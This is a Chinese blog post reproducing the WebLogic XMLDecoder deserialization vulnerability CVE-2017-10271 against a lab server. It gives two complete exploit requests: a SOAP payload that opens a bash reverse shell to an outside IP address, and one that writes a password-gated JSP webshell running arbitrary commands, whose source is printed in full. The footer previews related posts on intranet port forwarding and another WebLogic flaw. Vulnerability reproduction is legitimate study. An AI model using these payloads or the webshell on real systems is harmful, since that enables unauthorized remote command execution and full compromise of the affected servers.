WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)

漏洞复现
漏洞复现
发布日期:   2020-12-29

WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)

访问 http://192.168.74.133:7001/

判断为weblogic,访问http://192.168.74.133:7001/wls-wsat/CoordinatorPortType

显示如下则说明可能存在漏洞

反弹shell:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.74.133:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/118.31.45.105/5000 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

反弹成功。

写入webshell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.74.133:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 1274

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

成功写入,访问webshell。

使用工具检测

文章作者: Danie1
文章链接: https://danie1233.github.io/2020/12/29/WebLogic%20XMLDecoder%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2017-10271%EF%BC%89/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Danie1 !
漏洞复现
 上一篇
内网渗透中转发工具总结 内网渗透中转发工具总结
内网渗透中转发工具总结 LCX转发 内网机器上执行:lcx.exe –slave 公网IP +端口 内网IP +端口 lcx.exe -slave 192.168.43.142 51 192.168.43.137 3389 将内网(192
2020-12-30 内网渗透
内网渗透 红蓝对抗
下一篇 
weblogic 未授权命令执行漏洞(CVE-2020-14882)复现 weblogic 未授权命令执行漏洞(CVE-2020-14882)复现
weblogic 未授权命令执行漏洞(CVE-2020-14882)复现 影响版本 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle W
2020-12-28 漏洞复现
漏洞复现
  目录